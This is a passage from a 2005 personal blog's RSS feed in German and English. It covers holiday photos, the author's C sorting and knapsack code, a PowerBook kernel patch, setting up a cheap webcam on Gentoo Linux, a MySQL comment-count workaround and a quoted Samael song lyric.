  9206. <a href="https://blog.x-way.org/images/landes05_12.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_12_t.jpg" alt="Zwei Eidechsen" title="Klick für grössere Ansicht"></a>
  9207. </dt>
  9208. <dd class="tdlb">Zwei Eidechsen</dd>
  9209. <dt class="tdla">
  9210. <a href="https://blog.x-way.org/images/landes05_13.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_13_t.jpg" alt="Spezieller Grashüpfer" title="Klick für grössere Ansicht"></a>
  9211. </dt>
  9212. <dd class="tdla">Spezieller Grashüpfer</dd>
  9213. <dt class="tdlb">
  9214. <a href="https://blog.x-way.org/images/landes05_14.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_14_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9215. </dt>
  9216. <dd class="tdlb">Auf dem Rückweg überquerten wir den <a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9217. <dt class="tdla">
  9218. <a href="https://blog.x-way.org/images/landes05_15.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_15_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9219. </dt>
  9220. <dd class="tdla"><a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9221. <dt class="tdlb">
  9222. <a href="https://blog.x-way.org/images/landes05_16.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_16_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9223. </dt>
  9224. <dd class="tdlb"><a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9225. <dt class="tdla">
  9226. <a href="https://blog.x-way.org/images/landes05_17.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_17_t.jpg" alt="Brücke von Les Vignes" title="Klick für grössere Ansicht"></a>
  9227. </dt>
  9228. <dd class="tdla">Brücke von Les Vignes</dd>
  9229. <dt class="tdlb">
  9230. <a href="https://blog.x-way.org/images/landes05_18.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_18_t.jpg" alt="Felsformation bei Les Vignes" title="Klick für grössere Ansicht"></a>
  9231. </dt>
  9232. <dd class="tdlb">Felsformation bei Les Vignes</dd>
  9233. <dt class="tdlb">
  9234. <a href="https://blog.x-way.org/images/landes05_04.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_04_t.jpg" alt="Ferienlektüre" title="Klick für grössere Ansicht"></a>
  9235. </dt>
  9236. <dd class="tdlb">Ferienlektüre</dd>
  9237. <dt class="tdla">
  9238. <a href="https://blog.x-way.org/images/landes05_05.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_05_t.jpg" alt="" title="Klick für grössere Ansicht"></a>
  9239. </dt>
  9240. <dd class="tdlb"></dd>
  9241. </dl>
  9242.  
  9243. ]]></content:encoded>
  9244.  </item>
  9245.  
  9246.  <item>
  9247.    <title>Knapsack 0/1 and sorting algorithms</title>
  9248.    <link>https://blog.x-way.org/Coding/2005/07/02/Knapsack-01-and-sorting-algorithms.html</link>
  9249.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324068</guid>
  9250.    <dc:creator>Andreas Jaggi</dc:creator>
  9251.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9252.    <pubDate>Sat, 02 Jul 2005 01:56:12 +0000</pubDate>
  9253.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9254.    <description><![CDATA[<p>As an exercice for the algorithm test of next monday i implemented some algorithms in C.<br>
  9255. There are: </p>
  9256.  
  9257. <ul>
  9258. <li><a href="http://en.wikipedia.org/wiki/Gnome_sort" title="Gnome sort on Wikipedia">gnome sort</a></li>
  9259.  
  9260. <li><a href="http://en.wikipedia.org/wiki/Insertion_sort" title="Insertion sort on Wikipedia">insertion sort</a></li>
  9261.  
  9262. <li><a href="http://en.wikipedia.org/wiki/Selection_sort" title="Selection sort on Wikipedia">selection sort</a></li>
  9263.  
  9264. <li><a href="http://en.wikipedia.org/wiki/Shell_sort" title="Shell sort on Wikipedia">shell sort</a></li>
  9265.  
  9266. <li><a href="http://en.wikipedia.org/wiki/Merge_sort" title="Merge sort on Wikipedia">merge sort</a></li>
  9267.  
  9268. <li><a href="http://en.wikipedia.org/wiki/Bubble_sort" title="Bubble sort on Wikipedia">bubble sort</a></li>
  9269.  
  9270. <li><a href="http://en.wikipedia.org/wiki/Quicksort" title="Quicksort on Wikipedia">quicksort</a></li>
  9271.  
  9272. <li><a href="http://en.wikipedia.org/wiki/Heapsort" title="Heapsort on Wikipedia">heapsort</a></li>
  9273.  
  9274. <li><a href="http://en.wikipedia.org/wiki/Knapsack_problem" title="Knapsack on Wikipedia">knapsack</a> 0/1 algorithm</li>
  9275. </ul>
  9276.  
  9277. <p>The source code is available under the BSD License:</p>
  9278.  
  9279. <ul>
  9280. <li><a href="https://blog.x-way.org/stuff/sort.c" title="Source code of sort.c">sorting algorithms</a><br>
  9281.  
  9282. </li>
  9283.  
  9284. <li><a href="https://blog.x-way.org/stuff/knapsack01.c" title="Source code of knapsack01.c">knapsack 0/1 algorithm</a>
  9285.    <br>
  9286. </li>
  9287. </ul>
  9288. ]]></description>
  9289.    <content:encoded><![CDATA[<p>As an exercice for the algorithm test of next monday i implemented some algorithms in C.<br>
  9290. There are: </p>
  9291.  
  9292. <ul>
  9293. <li><a href="http://en.wikipedia.org/wiki/Gnome_sort" title="Gnome sort on Wikipedia">gnome sort</a></li>
  9294.  
  9295. <li><a href="http://en.wikipedia.org/wiki/Insertion_sort" title="Insertion sort on Wikipedia">insertion sort</a></li>
  9296.  
  9297. <li><a href="http://en.wikipedia.org/wiki/Selection_sort" title="Selection sort on Wikipedia">selection sort</a></li>
  9298.  
  9299. <li><a href="http://en.wikipedia.org/wiki/Shell_sort" title="Shell sort on Wikipedia">shell sort</a></li>
  9300.  
  9301. <li><a href="http://en.wikipedia.org/wiki/Merge_sort" title="Merge sort on Wikipedia">merge sort</a></li>
  9302.  
  9303. <li><a href="http://en.wikipedia.org/wiki/Bubble_sort" title="Bubble sort on Wikipedia">bubble sort</a></li>
  9304.  
  9305. <li><a href="http://en.wikipedia.org/wiki/Quicksort" title="Quicksort on Wikipedia">quicksort</a></li>
  9306.  
  9307. <li><a href="http://en.wikipedia.org/wiki/Heapsort" title="Heapsort on Wikipedia">heapsort</a></li>
  9308.  
  9309. <li><a href="http://en.wikipedia.org/wiki/Knapsack_problem" title="Knapsack on Wikipedia">knapsack</a> 0/1 algorithm</li>
  9310. </ul>
  9311.  
  9312. <p>The source code is available under the BSD License:</p>
  9313.  
  9314. <ul>
  9315. <li><a href="https://blog.x-way.org/stuff/sort.c" title="Source code of sort.c">sorting algorithms</a><br>
  9316.  
  9317. </li>
  9318.  
  9319. <li><a href="https://blog.x-way.org/stuff/knapsack01.c" title="Source code of knapsack01.c">knapsack 0/1 algorithm</a>
  9320.    <br>
  9321. </li>
  9322. </ul>
  9323. ]]></content:encoded>
  9324.  </item>
  9325.  
  9326.  <item>
  9327.    <title>rl and rs</title>
  9328.    <link>https://blog.x-way.org/Coding/2005/06/30/rl-and-rs.html</link>
  9329.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324067</guid>
  9330.    <dc:creator>Andreas Jaggi</dc:creator>
  9331.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9332.    <pubDate>Thu, 30 Jun 2005 22:01:55 +0000</pubDate>
  9333.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9334.    <description><![CDATA[<p><code>rl</code> and <code>rs</code> are two small command-line programs written in C.</p>
  9335.  
  9336. <ul>
  9337. <li><code>rl</code> removes starting line(s) from stdin.</li>
  9338.  
  9339. <li><code>rs</code> reverses it's input.</li>
  9340. </ul>
  9341.  
  9342. <p>The source code is available under the BSD License:</p>
  9343.  
  9344. <ul>
  9345. <li><a href="https://blog.x-way.org/stuff/rl.c" title="Download the source code for rl">rl.c</a></li>
  9346.  
  9347. <li><a href="https://blog.x-way.org/stuff/rs.c" title="Download the source code for rs">rs.c</a></li>
  9348. </ul>
  9349. ]]></description>
  9350.    <content:encoded><![CDATA[<p><code>rl</code> and <code>rs</code> are two small command-line programs written in C.</p>
  9351.  
  9352. <ul>
  9353. <li><code>rl</code> removes starting line(s) from stdin.</li>
  9354.  
  9355. <li><code>rs</code> reverses it's input.</li>
  9356. </ul>
  9357.  
  9358. <p>The source code is available under the BSD License:</p>
  9359.  
  9360. <ul>
  9361. <li><a href="https://blog.x-way.org/stuff/rl.c" title="Download the source code for rl">rl.c</a></li>
  9362.  
  9363. <li><a href="https://blog.x-way.org/stuff/rs.c" title="Download the source code for rs">rs.c</a></li>
  9364. </ul>
  9365. ]]></content:encoded>
  9366.  </item>
  9367.  
  9368.  <item>
  9369.    <title>linux-2.6.11.7-alubuttons.patch</title>
  9370.    <link>https://blog.x-way.org/Linux/2005/04/17/linux-2-6-11-7-alubuttons-patch.html</link>
  9371.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324066</guid>
  9372.    <dc:creator>Andreas Jaggi</dc:creator>
  9373.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9374.    <pubDate>Sun, 17 Apr 2005 17:58:42 +0000</pubDate>
  9375.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  9376.    <description><![CDATA[<p>Da gerade mein <a title="kernel.org" href="http://www.kernel.org/">Kernel</a> &quot;geupdatet&quot; wird, habe ich den Patch zur Unterstützung der PowerBook Buttons an die <a title="linux-2.6.11.7-alubuttons.patch" href="https://blog.x-way.org/stuff/linux-2.6.11.7-alubuttons.patch">aktuelle Kernelversion angepasst</a>.</p>
  9377.  
  9378. <p>Bei dieser Gelegenheit habe ich den neuen Patch an ein paar
  9379. Kernelentwickler geschickt, vielleicht schafft er's diesmal bis in den
  9380. &quot;offiziellen&quot; Kernel.
  9381. </p>
  9382.  
  9383. <p><b>Update:</b><br>
  9384. Der Patch hat's bis zu Linus geschafft (<a title="[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4" href="http://kernel.org/git/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=146a4b3bdfb5641bfbf975e29680b482b8b343ba">[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4</a>), wird also in der nächsten Kernelversion dabei sein :-)</p>
  9385. ]]></description>
  9386.    <content:encoded><![CDATA[<p>Da gerade mein <a title="kernel.org" href="http://www.kernel.org/">Kernel</a> &quot;geupdatet&quot; wird, habe ich den Patch zur Unterstützung der PowerBook Buttons an die <a title="linux-2.6.11.7-alubuttons.patch" href="https://blog.x-way.org/stuff/linux-2.6.11.7-alubuttons.patch">aktuelle Kernelversion angepasst</a>.</p>
  9387.  
  9388. <p>Bei dieser Gelegenheit habe ich den neuen Patch an ein paar
  9389. Kernelentwickler geschickt, vielleicht schafft er's diesmal bis in den
  9390. &quot;offiziellen&quot; Kernel.
  9391. </p>
  9392.  
  9393. <p><b>Update:</b><br>
  9394. Der Patch hat's bis zu Linus geschafft (<a title="[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4" href="http://kernel.org/git/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=146a4b3bdfb5641bfbf975e29680b482b8b343ba">[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4</a>), wird also in der nächsten Kernelversion dabei sein :-)</p>
  9395. ]]></content:encoded>
  9396.  </item>
  9397.  
  9398.  <item>
  9399.    <title>Webcam</title>
  9400.    <link>https://blog.x-way.org/Misc/2005/04/03/Webcam.html</link>
  9401.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324065</guid>
  9402.    <dc:creator>Andreas Jaggi</dc:creator>
  9403.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9404.    <pubDate>Sun, 03 Apr 2005 11:02:00 +0000</pubDate>
  9405.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  9406.    <description><![CDATA[<a title="Webcam" href="https://blog.x-way.org/webcam.htm"><img width="352" height="288" src="https://blog.x-way.org/webcam.jpg" alt="Webcam" title="Webcam"></a>
  9407. ]]></description>
  9408.    <content:encoded><![CDATA[<a title="Webcam" href="https://blog.x-way.org/webcam.htm"><img width="352" height="288" src="https://blog.x-way.org/webcam.jpg" alt="Webcam" title="Webcam"></a>
  9409. ]]></content:encoded>
  9410.  </item>
  9411.  
  9412.  <item>
  9413.    <title>Typhoon Webshot II und Linux</title>
  9414.    <link>https://blog.x-way.org/Linux/2005/04/01/Typhoon-Webshot-II-und-Linux.html</link>
  9415.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324064</guid>
  9416.    <dc:creator>Andreas Jaggi</dc:creator>
  9417.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9418.    <pubDate>Fri, 01 Apr 2005 23:15:22 +0000</pubDate>
  9419.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  9420.    <description><![CDATA[<a href="https://blog.x-way.org/images/webshot2.jpg" style="border: 0px none ;" title="Typhoon Webshot II (Klick für grössere Ansicht)"><img width="290" height="158" src="https://blog.x-way.org/images/webshot2_thumb.jpg" alt="Typhoon Webshot II (Thumbnail)" title="Typhoon Webshot II (Klick für grössere Ansicht)" style="border: 0px none ;"></a>
  9421. <p>Heute habe ich beim Einkaufen diese 'Webcam' entdeckt. Für 29.90 CHF
  9422. (~20&#8364;) bietet sie bis zu 30 640&#215;480 Pixel grosse Bilder pro Sekunde.
  9423. Mit dabei eine CD mit Treiber für Windows 98 bis XP.
  9424. </p>
  9425.  
  9426. <p>Als ich sie an mein Linux-PowerBook anschloss sagte mir <code>dmesg</code> nur gerade diese zwei Zeilen:
  9427. </p>
  9428.  
  9429. <pre><code>ohci_hcd 0001:01:1b.0: remote wakeup
  9430. usb 3-1: new full speed USB device using address 2</code></pre>
  9431. <p>Von <a href="http://www.kroah.com/linux-usb/" title="USBView">usbview</a> wurde die Webcam auch nicht erkannt. Also super Voraussetzungen für einen Betrieb mit Linux.<br>
  9432. </p>
  9433.  
  9434. <p>Nach etwas <a href="http://www.google.com/search?q=linux+typhoon+webshot+ii" title="http://www.google.com/search?q=linux+typhoon+webshot+ii">googeln</a> fand ich <a href="http://spca50x.sourceforge.net/" title="SPCA50X USB Camera Linux Driver">spca50x.sf.net</a> und das entsprechende <a href="http://mxhaard.free.fr/download.html" title="spca5xx Download">2.6er-Kernerlmodul</a>. Erfreulicherweise ist das auch im <a href="https://web.archive.org/web/20050405203313/http://packagestest.gentoo.org/ebuilds/?spca5xx-20050328">Portage-Tree</a> von <a href="http://www.gentoo.org" title="Gentoo Linux">Gentoo</a>. Also schnell ein <code>emerge spca5xx</code>. Ein <code>modprobe spca5xx</code>
  9435. lässt einige Fehlermeldungen erscheinen (Unresolved Symbols). Abhilfe
  9436. schafft das Aktivieren der Video for Linux Unterstützung im <a href="http://www.kernel.org" title="kernel.org">Kernel</a>.
  9437. Nach <code>make</code>, <code>make modules</code> und <code>make modules_install</code>
  9438. lädt das spca5xx Modul problemlos (eigentlich sollte man nach einem
  9439. Neukompilieren des Kernels auch den neuen Kernel laden und nicht nur
  9440. die neuen Module!).</p>
  9441.  
  9442. <p>Ein <code>chmod a+rx /dev/video0</code> als <code>root</code> behebt Berechtigunsprobleme, welche beim Zugriff als normaler Benutzer auftreten können.
  9443. </p>
  9444.  
  9445. <p>Fazit:</p>
  9446.  
  9447. <ul>
  9448. <li>Die Webcam bietet IMHO mehr als man für 30 CHF erwarten kann</li>
  9449.  
  9450. <li>Mit Linux kann man ohne Neustart Peripheriegeräte von 'unbekannt' zu 'vollständig unterstützt' ändern</li>
  9451. </ul>
  9452. ]]></description>
  9453.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/webshot2.jpg" style="border: 0px none ;" title="Typhoon Webshot II (Klick für grössere Ansicht)"><img width="290" height="158" src="https://blog.x-way.org/images/webshot2_thumb.jpg" alt="Typhoon Webshot II (Thumbnail)" title="Typhoon Webshot II (Klick für grössere Ansicht)" style="border: 0px none ;"></a>
  9454. <p>Heute habe ich beim Einkaufen diese 'Webcam' entdeckt. Für 29.90 CHF
  9455. (~20&#8364;) bietet sie bis zu 30 640&#215;480 Pixel grosse Bilder pro Sekunde.
  9456. Mit dabei eine CD mit Treiber für Windows 98 bis XP.
  9457. </p>
  9458.  
  9459. <p>Als ich sie an mein Linux-PowerBook anschloss sagte mir <code>dmesg</code> nur gerade diese zwei Zeilen:
  9460. </p>
  9461.  
  9462. <pre><code>ohci_hcd 0001:01:1b.0: remote wakeup
  9463. usb 3-1: new full speed USB device using address 2</code></pre>
  9464. <p>Von <a href="http://www.kroah.com/linux-usb/" title="USBView">usbview</a> wurde die Webcam auch nicht erkannt. Also super Voraussetzungen für einen Betrieb mit Linux.<br>
  9465. </p>
  9466.  
  9467. <p>Nach etwas <a href="http://www.google.com/search?q=linux+typhoon+webshot+ii" title="http://www.google.com/search?q=linux+typhoon+webshot+ii">googeln</a> fand ich <a href="http://spca50x.sourceforge.net/" title="SPCA50X USB Camera Linux Driver">spca50x.sf.net</a> und das entsprechende <a href="http://mxhaard.free.fr/download.html" title="spca5xx Download">2.6er-Kernerlmodul</a>. Erfreulicherweise ist das auch im <a href="https://web.archive.org/web/20050405203313/http://packagestest.gentoo.org/ebuilds/?spca5xx-20050328">Portage-Tree</a> von <a href="http://www.gentoo.org" title="Gentoo Linux">Gentoo</a>. Also schnell ein <code>emerge spca5xx</code>. Ein <code>modprobe spca5xx</code>
  9468. lässt einige Fehlermeldungen erscheinen (Unresolved Symbols). Abhilfe
  9469. schafft das Aktivieren der Video for Linux Unterstützung im <a href="http://www.kernel.org" title="kernel.org">Kernel</a>.
  9470. Nach <code>make</code>, <code>make modules</code> und <code>make modules_install</code>
  9471. lädt das spca5xx Modul problemlos (eigentlich sollte man nach einem
  9472. Neukompilieren des Kernels auch den neuen Kernel laden und nicht nur
  9473. die neuen Module!).</p>
  9474.  
  9475. <p>Ein <code>chmod a+rx /dev/video0</code> als <code>root</code> behebt Berechtigunsprobleme, welche beim Zugriff als normaler Benutzer auftreten können.
  9476. </p>
  9477.  
  9478. <p>Fazit:</p>
  9479.  
  9480. <ul>
  9481. <li>Die Webcam bietet IMHO mehr als man für 30 CHF erwarten kann</li>
  9482.  
  9483. <li>Mit Linux kann man ohne Neustart Peripheriegeräte von 'unbekannt' zu 'vollständig unterstützt' ändern</li>
  9484. </ul>
  9485. ]]></content:encoded>
  9486.  </item>
  9487.  
  9488.  <item>
  9489.    <title>Bug in MySQL 4.1.10a?</title>
  9490.    <link>https://blog.x-way.org/Coding/2005/04/01/Bug-in-MySQL-4-1-10a.html</link>
  9491.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324063</guid>
  9492.    <dc:creator>Andreas Jaggi</dc:creator>
  9493.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9494.    <pubDate>Fri, 01 Apr 2005 22:01:00 +0000</pubDate>
  9495.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9496.    <description><![CDATA[<p>Bisher wurden die Einträge der Indexseite mit diesem SQL-Statement abgefragt:
  9497. </p>
  9498.  
  9499. <pre><code>SELECT w.*, a.nick AS nick, cat.name AS categoryname,
  9500. count(c.id) AS comments,
  9501. l.name AS languagename, l.code AS lc
  9502. FROM `x-log_weblog` AS w, `x-log_authors` AS a,
  9503. `x-log_languages` AS l, `x-log_categories` AS cat
  9504. LEFT JOIN `x-log_comments` AS c ON w.id = c.posting
  9505. WHERE a.id = w.author
  9506. AND cat.id = w.category
  9507. AND w.date &lt;= NOW()
  9508. AND w.public = '1'
  9509. AND w.language &amp; l.id &gt; 0
  9510. GROUP BY w.id
  9511. ORDER BY w.date DESC</code></pre>
  9512. <p>Doch seit <a href="http://hostpoint.ch/" title="Hostpoint - The Data Residence">Hostpoint</a> auf <a href="http://www.mysql.com/" title="MySQL: Die populärste Open-Source-Datenbank der Welt">MySQL</a> 4.1.10a umgestellt hat, stimmt die Anzahl der Kommentare nicht mehr.</p>
  9513.  
  9514. <p>Nach diversen erfolglosen Versuchen die <code>LEFT JOIN</code> Anweisung zu ändern, habe ich in einem <a href="http://bugs.mysql.com/bug.php?id=8821" title="MySQL Bugs: #8821: join to subquery without distinct causes bad COUNT">Bugreport</a> eine Lösung gefunden:</p>
  9515.  
  9516. <pre><code>count(DISTINCT c.id)</code></pre>
  9517. <p>Mangels spezifischer Kenntnisse kann ich nicht beurteilen ob das nun
  9518. ein Bug oder ein Feature ist. Aber da mehrere Bugreports dazu
  9519. existieren scheint es eher ein Bug zu sein.</p>
  9520. ]]></description>
  9521.    <content:encoded><![CDATA[<p>Bisher wurden die Einträge der Indexseite mit diesem SQL-Statement abgefragt:
  9522. </p>
  9523.  
  9524. <pre><code>SELECT w.*, a.nick AS nick, cat.name AS categoryname,
  9525. count(c.id) AS comments,
  9526. l.name AS languagename, l.code AS lc
  9527. FROM `x-log_weblog` AS w, `x-log_authors` AS a,
  9528. `x-log_languages` AS l, `x-log_categories` AS cat
  9529. LEFT JOIN `x-log_comments` AS c ON w.id = c.posting
  9530. WHERE a.id = w.author
  9531. AND cat.id = w.category
  9532. AND w.date &lt;= NOW()
  9533. AND w.public = '1'
  9534. AND w.language &amp; l.id &gt; 0
  9535. GROUP BY w.id
  9536. ORDER BY w.date DESC</code></pre>
  9537. <p>Doch seit <a href="http://hostpoint.ch/" title="Hostpoint - The Data Residence">Hostpoint</a> auf <a href="http://www.mysql.com/" title="MySQL: Die populärste Open-Source-Datenbank der Welt">MySQL</a> 4.1.10a umgestellt hat, stimmt die Anzahl der Kommentare nicht mehr.</p>
  9538.  
  9539. <p>Nach diversen erfolglosen Versuchen die <code>LEFT JOIN</code> Anweisung zu ändern, habe ich in einem <a href="http://bugs.mysql.com/bug.php?id=8821" title="MySQL Bugs: #8821: join to subquery without distinct causes bad COUNT">Bugreport</a> eine Lösung gefunden:</p>
  9540.  
  9541. <pre><code>count(DISTINCT c.id)</code></pre>
  9542. <p>Mangels spezifischer Kenntnisse kann ich nicht beurteilen ob das nun
  9543. ein Bug oder ein Feature ist. Aber da mehrere Bugreports dazu
  9544. existieren scheint es eher ein Bug zu sein.</p>
  9545. ]]></content:encoded>
  9546.  </item>
  9547.  
  9548.  <item>
  9549.    <title>Lang – Kurz</title>
  9550.    <link>https://blog.x-way.org/Misc/2005/04/01/Lang-Kurz.html</link>
  9551.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324062</guid>
  9552.    <dc:creator>Andreas Jaggi</dc:creator>
  9553.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9554.    <pubDate>Fri, 01 Apr 2005 00:33:47 +0000</pubDate>
  9555.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  9556.    <description><![CDATA[<img width="303" height="209" src="https://blog.x-way.org/images/langkurz.jpg" title="Lang - Kurz" alt="Lang - Kurz" style="border: 0;">
  9557. ]]></description>
  9558.    <content:encoded><![CDATA[<img width="303" height="209" src="https://blog.x-way.org/images/langkurz.jpg" title="Lang - Kurz" alt="Lang - Kurz" style="border: 0;">
  9559. ]]></content:encoded>
  9560.  </item>
  9561.  
  9562.  <item>
  9563.    <title>Samael – On Earth</title>
  9564.    <link>https://blog.x-way.org/Music/2005/03/06/Samael-On-Earth.html</link>
  9565.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324061</guid>
  9566.    <dc:creator>Andreas Jaggi</dc:creator>
  9567.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9568.    <pubDate>Sun, 06 Mar 2005 17:39:36 +0000</pubDate>
  9569.    <category domain="https://blog.x-way.org/Music">Music</category>
  9570.    <description><![CDATA[<img src="https://blog.x-way.org/images/samael_reignoflight.jpg" width="200" height="210" alt="Samael - Reign Of Light" title="Samael - Reign Of Light">
  9571. <p>
  9572. Before we could talk<br>
  9573. We were singing<br>
  9574. Before we could run<br>
  9575. We were dancing<br>
  9576. Life is short<br>
  9577. But not a day is lost<br>
  9578. The world goes round and round<br>
  9579. And we go on and on…<br>
  9580. </p>
  9581. <br><br>
  9582. <p>
  9583. Beijing to Amsterdam<br>
  9584. Berlin to Buenos Aires<br>
  9585. Sydney to L.A.<br>
  9586. Rio to Abidjan<br>
  9587. Stockholm to Athena<br>
  9588. Dublin to Guatemala<br>
  9589. London to Brasilia<br>
  9590. Madrid to Philadelphia<br>
  9591. </p>
  9592. <p>
  9593. Paris to San Francisco<br>
  9594. Detroit to Warszawa<br>
  9595. Moscow to Mexico<br>
  9596. Oslo to New Dehli<br>
  9597. Helsinki to New Orleans<br>
  9598. Vienna to Ankara<br>
  9599. Roma to Lisboa<br>
  9600. On earth, we're all<br>
  9601. </p>
  9602. <p>
  9603. Dancing with the hidden tribe<br>
  9604. Learning to move and fly<br>
  9605. Touching the sky with our hands<br>
  9606. Longing to love to understand<br>
  9607. </p>
  9608. <p>
  9609. Dancing with the hidden tribe<br>
  9610. Learning to move and fly<br>
  9611. Touching the sky with our hands<br>
  9612. Longing to love to understand<br>
  9613. </p>
  9614. <p>
  9615. Wide World!<br>
  9616. Our World!<br>
  9617. </p>
  9618. <p>
  9619. New York to Tokyo<br>
  9620. Melbourne to Budapest<br>
  9621. Prague to Jaipur<br>
  9622. Shangai to Montreal<br>
  9623. Vancouver to Singapore<br>
  9624. Sofia to Johannesburg<br>
  9625. Hong Kong to St. Petersburg<br>
  9626. On earth, we're all<br>
  9627. </p>
  9628. <p>
  9629. Dancing with the hidden tribe<br>
  9630. Learning to move and fly<br>
  9631. Touching the sky with our hands<br>
  9632. Longing to love to understand<br>
  9633. </p>
  9634. <p>
  9635. Dancing with the hidden tribe<br>
  9636. Learning to move and fly<br>
  9637. Touching the sky with our hands<br>
  9638. Longing to love to understand<br>
  9639. </p>
  9640. <p>
  9641. Wide World!<br>
  9642. Wide World!<br>
  9643. Our World!<br>
  9644. </p>
  9645. <p>
  9646. Dancing with the hidden tribe<br>
  9647. Learning to move and fly<br>
  9648. Touching the sky with our hands<br>
  9649. Longing to love to understand<br>
  9650. </p>
  9651. <p>
  9652. Dancing with the hidden tribe<br>
  9653. Learning to move and fly<br>
  9654. Touching the sky with our hands<br>
  9655. Longing to love to understand<br>
  9656. </p>
  9657. ]]></description>
  9658.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/samael_reignoflight.jpg" width="200" height="210" alt="Samael - Reign Of Light" title="Samael - Reign Of Light">
  9659. <p>
  9660. Before we could talk<br>
  9661. We were singing<br>
  9662. Before we could run<br>
  9663. We were dancing<br>
  9664. Life is short<br>
  9665. But not a day is lost<br>
  9666. The world goes round and round<br>
  9667. And we go on and on…<br>
  9668. </p>
  9669. <br><br>
  9670. <p>
  9671. Beijing to Amsterdam<br>
  9672. Berlin to Buenos Aires<br>
  9673. Sydney to L.A.<br>
  9674. Rio to Abidjan<br>
  9675. Stockholm to Athena<br>
  9676. Dublin to Guatemala<br>
  9677. London to Brasilia<br>
  9678. Madrid to Philadelphia<br>
  9679. </p>
  9680. <p>
  9681. Paris to San Francisco<br>
  9682. Detroit to Warszawa<br>
  9683. Moscow to Mexico<br>
  9684. Oslo to New Dehli<br>
  9685. Helsinki to New Orleans<br>
  9686. Vienna to Ankara<br>
  9687. Roma to Lisboa<br>
  9688. On earth, we're all<br>
  9689. </p>
  9690. <p>
  9691. Dancing with the hidden tribe<br>
  9692. Learning to move and fly<br>
  9693. Touching the sky with our hands<br>
  9694. Longing to love to understand<br>
  9695. </p>
  9696. <p>
  9697. Dancing with the hidden tribe<br>
  9698. Learning to move and fly<br>
  9699. Touching the sky with our hands<br>
  9700. Longing to love to understand<br>
  9701. </p>
  9702. <p>
  9703. Wide World!<br>
  9704. Our World!<br>
  9705. </p>
  9706. <p>
  9707. New York to Tokyo<br>
  9708. Melbourne to Budapest<br>
  9709. Prague to Jaipur<br>
  9710. Shangai to Montreal<br>
  9711. Vancouver to Singapore<br>
  9712. Sofia to Johannesburg<br>
  9713. Hong Kong to St. Petersburg<br>
  9714. On earth, we're all<br>
  9715. </p>
  9716. <p>
  9717. Dancing with the hidden tribe<br>
  9718. Learning to move and fly<br>
  9719. Touching the sky with our hands<br>
  9720. Longing to love to understand<br>
  9721. </p>
  9722. <p>
  9723. Dancing with the hidden tribe<br>
  9724. Learning to move and fly<br>
  9725. Touching the sky with our hands<br>
  9726. Longing to love to understand<br>
  9727. </p>
  9728. <p>
  9729. Wide World!<br>
  9730. Wide World!<br>
  9731. Our World!<br>
  9732. </p>
  9733. <p>
  9734. Dancing with the hidden tribe<br>
  9735. Learning to move and fly<br>
  9736. Touching the sky with our hands<br>
  9737. Longing to love to understand<br>
  9738. </p>
  9739. <p>
  9740. Dancing with the hidden tribe<br>
  9741. Learning to move and fly<br>
  9742. Touching the sky with our hands<br>
  9743. Longing to love to understand<br>
  9744. </p>
  9745. ]]></content:encoded>
  9746.  </item>
  9747.  
  9748.  <item>
  9749.    <title>phiki.waterwave.ch</title>
